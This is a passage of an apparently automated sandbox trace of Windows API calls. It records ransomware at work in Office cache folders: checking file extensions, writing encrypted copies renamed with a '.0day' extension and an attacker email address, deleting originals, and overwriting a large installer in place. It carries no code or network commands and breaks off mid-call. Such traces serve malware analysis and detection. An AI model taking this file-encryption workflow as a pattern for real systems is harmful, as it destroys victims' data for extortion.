lstrlenW (lpString=".jpg") returned 4 [0043.473] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.473] lstrlenW (lpString=".doc") returned 4 [0043.473] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString=".docx") returned 5 [0043.473] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0043.473] lstrlenW (lpString=".pdf") returned 4 [0043.473] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString=".xls") returned 4 [0043.473] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString=".xlsx") returned 5 [0043.473] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0043.473] lstrlenW (lpString=".ppt") returned 4 [0043.473] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.473] lstrlenW (lpString=".zip") returned 4 [0043.473] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString=".rar") returned 4 [0043.473] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString=".bz2") returned 4 [0043.473] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString=".7z") returned 3 [0043.473] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0043.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.473] lstrlenW (lpString=".dbf") returned 4 [0043.473] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.473] lstrlenW (lpString=".1cd") returned 4 [0043.473] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0043.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.474] lstrlenW (lpString=".jpg") returned 4 [0043.474] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0043.474] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0043.474] lstrlenW (lpString="msvcr90.dll") returned 11 [0043.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.474] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=655872) returned 1 [0043.474] CloseHandle (hObject=0x20c) returned 1 [0043.474] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 0x2020 [0043.474] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.474] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.474] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0043.475] GetLastError () returned 0x0 [0043.475] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xa0200, lpOverlapped=0x0) returned 1 [0043.670] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xa0210, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xa0210, lpOverlapped=0x0) returned 1 [0044.101] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.101] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.101] SetEndOfFile (hFile=0x16c) returned 1 [0044.147] CloseHandle (hObject=0x16c) returned 1 [0044.147] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.147] SetEndOfFile (hFile=0x20c) returned 1 [0044.152] CloseHandle (hObject=0x20c) returned 1 [0044.153] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.153] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 1 [0044.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.159] lstrlenW (lpString=".doc") returned 4 [0044.159] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.159] lstrlenW (lpString=".docx") returned 5 [0044.159] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0044.159] lstrlenW (lpString=".pdf") returned 4 [0044.160] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.160] lstrlenW (lpString=".xls") returned 4 [0044.160] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.160] lstrlenW (lpString=".xlsx") returned 5 [0044.160] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0044.160] lstrlenW (lpString=".ppt") returned 4 [0044.160] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.160] lstrlenW (lpString=".zip") returned 4 [0044.160] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.160] lstrlenW (lpString=".rar") returned 4 [0044.160] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.160] lstrlenW (lpString=".bz2") returned 4 [0044.160] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.160] lstrlenW (lpString=".7z") returned 3 [0044.160] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.160] lstrlenW (lpString=".dbf") returned 4 [0044.160] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.160] lstrlenW (lpString=".1cd") returned 4 [0044.160] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.160] lstrlenW (lpString=".jpg") returned 4 [0044.160] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.161] lstrlenW (lpString=".doc") returned 4 [0044.161] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.161] lstrlenW (lpString=".docx") returned 5 [0044.161] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0044.161] lstrlenW (lpString=".pdf") returned 4 [0044.161] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.161] lstrlenW (lpString=".xls") returned 4 [0044.161] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.161] lstrlenW (lpString=".xlsx") returned 5 [0044.161] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0044.161] lstrlenW (lpString=".ppt") returned 4 [0044.161] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.161] lstrlenW (lpString=".zip") returned 4 [0044.161] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.161] lstrlenW (lpString=".rar") returned 4 [0044.161] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.161] lstrlenW (lpString=".bz2") returned 4 [0044.161] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.161] lstrlenW (lpString=".7z") returned 3 [0044.161] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.161] lstrlenW (lpString=".dbf") returned 4 [0044.161] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.161] lstrlenW (lpString=".1cd") returned 4 [0044.161] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.161] lstrlenW (lpString=".jpg") returned 4 [0044.161] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.162] lstrcmpiW (lpString1=".MST", lpString2=".0day") returned 1 [0044.162] lstrlenW (lpString="ShellUI.MST") returned 11 [0044.162] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.172] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=3584) returned 1 [0044.172] CloseHandle (hObject=0x208) returned 1 [0044.172] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 0x2020 [0044.172] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.172] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.172] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.172] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.172] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.172] GetLastError () returned 0x0 [0044.172] ReadFile (in: hFile=0x208, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xe00, lpOverlapped=0x0) returned 1 [0044.174] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe10, lpOverlapped=0x0) returned 1 [0044.174] ReadFile (in: hFile=0x208, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.175] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.175] SetEndOfFile (hFile=0x20c) returned 1 [0044.175] CloseHandle (hObject=0x20c) returned 1 [0044.175] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.175] SetEndOfFile (hFile=0x208) returned 1 [0044.176] CloseHandle (hObject=0x208) returned 1 [0044.176] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.176] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 1 [0044.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.176] lstrlenW (lpString=".doc") returned 4 [0044.176] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0044.176] lstrlenW (lpString=".docx") returned 5 [0044.176] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0044.176] lstrlenW (lpString=".pdf") returned 4 [0044.176] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0044.176] lstrlenW (lpString=".xls") returned 4 [0044.176] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0044.176] lstrlenW (lpString=".xlsx") returned 5 [0044.176] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0044.176] lstrlenW (lpString=".ppt") returned 4 [0044.176] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0044.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.177] lstrlenW (lpString=".zip") returned 4 [0044.177] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0044.177] lstrlenW (lpString=".rar") returned 4 [0044.177] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0044.177] lstrlenW (lpString=".bz2") returned 4 [0044.177] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0044.177] lstrlenW (lpString=".7z") returned 3 [0044.177] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0044.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.177] lstrlenW (lpString=".dbf") returned 4 [0044.177] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0044.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.177] lstrlenW (lpString=".1cd") returned 4 [0044.177] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0044.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.177] lstrlenW (lpString=".jpg") returned 4 [0044.177] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0044.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.177] lstrlenW (lpString=".doc") returned 4 [0044.177] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0044.177] lstrlenW (lpString=".docx") returned 5 [0044.177] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0044.177] lstrlenW (lpString=".pdf") returned 4 [0044.177] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0044.177] lstrlenW (lpString=".xls") returned 4 [0044.177] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0044.177] lstrlenW (lpString=".xlsx") returned 5 [0044.177] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0044.178] lstrlenW (lpString=".ppt") returned 4 [0044.178] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0044.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.178] lstrlenW (lpString=".zip") returned 4 [0044.178] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0044.178] lstrlenW (lpString=".rar") returned 4 [0044.178] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0044.178] lstrlenW (lpString=".bz2") returned 4 [0044.178] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0044.178] lstrlenW (lpString=".7z") returned 3 [0044.178] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0044.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.178] lstrlenW (lpString=".dbf") returned 4 [0044.178] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0044.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.178] lstrlenW (lpString=".1cd") returned 4 [0044.178] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0044.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0044.178] lstrlenW (lpString=".jpg") returned 4 [0044.178] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0044.178] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0044.178] lstrlenW (lpString="AccessMUI.msi") returned 13 [0044.178] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.179] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=2517504) returned 1 [0044.179] CloseHandle (hObject=0x208) returned 1 [0044.179] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 0x2020 [0044.179] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.179] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0044.180] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.180] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0044.180] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.180] ReadFile (in: hFile=0x208, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.185] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.185] ReadFile (in: hFile=0x208, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.193] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.193] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.193] ReadFile (in: hFile=0x208, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.393] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.393] WriteFile (in: hFile=0x208, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0044.617] SetEndOfFile (hFile=0x208) returned 1 [0044.619] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0044.802] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.802] WriteFile (in: hFile=0x208, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.803] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.803] WriteFile (in: hFile=0x208, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.808] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.808] WriteFile (in: hFile=0x208, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.811] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0044.811] CloseHandle (hObject=0x208) returned 1 [0044.811] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[my0day@aol.com].0day", 